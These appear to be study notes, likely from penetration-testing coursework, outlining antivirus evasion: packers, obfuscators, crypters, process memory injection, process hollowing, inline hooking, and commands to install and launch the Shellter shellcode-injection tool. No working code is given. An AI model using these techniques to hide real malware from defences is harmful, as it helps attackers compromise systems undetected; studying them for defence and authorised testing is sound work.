Antivirus Evasion
Bypass Antivirus Software
Methods of Detecting Malicious Code
Bypassing Antivirus Detection
On-Disk Evasion
-
Packers
Generate smaller, functional equivalent and completely new binary stucture.
New Signature.
-
Obfuscators
Replacing instructions with semantically equivalent ones, inserting irrelevant instructions, and dead code. Splitting and reordering functions.
-
Crypters
Cryptographically alter executable code, adding a decrypting stub to restore original code upon execution. Decryption happens in memory, leaving encrypted code on disk.
-
Software Protectors
In-Memory Evasion
Doesn't write any code to disk.
Remote Process Memory Injection
Allocate memory in some valid PE that's not malicious. Copy malicious payload to newly allocated memory.
Reflective DLL Injection
Process Hollowing
Launch non-malicous process in suspended state.
Image of process removed from memory and replaced with malicous image.
Then resume process and execute malicous code.
Inline Hooking
Modifying memory to redirect code execution to point to malicous code in a modified function .
Flow will return to modified function and resume execution.
Shellter
Shell code injection tool. Most popular free tool bypassing AV software.
sudo apt install shellter
sudo shellter